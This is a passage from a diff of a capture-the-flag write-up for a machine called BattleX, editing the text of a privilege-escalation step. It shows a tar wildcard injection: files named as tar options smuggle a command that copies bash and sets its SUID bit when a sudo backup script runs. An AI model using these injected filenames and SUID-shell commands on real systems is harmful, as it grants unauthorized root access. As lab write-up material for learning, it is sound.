gr33pp/BattleX/Writeups/BattleX_CTF_machine2.md

 sudo tar -cf backup.tar *
 ```
-I can't alter the file to change its content but I can only run the script. `tar` can be exploited to gain access.
-The exploit is known as wildcard injection.
-The process I took was this
+I can't alter the script to change its content but I can only run it. `tar` can be exploited to gain access.
+The exploit I will be applying is known as wildcard injection.

 ```bash
 echo 'cp /bin/bash /home/hacksparo/bash; chmod +s /home/hacksparo/bash' > /home/hacksparo/shell.sh
 echo "" > "--checkpoint-action=exec=sh shell.sh"
 echo "" > --checkpoint=1
 ```
-Running that and running `sudo /bin/bash /opt/backup/backup.sh` will copy bash from /bin/ directory to my current direcotry and set suid bit to it.
+Running that and `sudo /bin/bash /opt/backup/backup.sh` will copy bash from /bin/ directory to my current direcotry and set suid bit to it.

 ```
 hacksparo@BattleX:~$ echo 'cp /bin/bash /home/hacksparo/bash; chmod +s /home/hacksparo/bash' > /home/hacksparo/shell.sh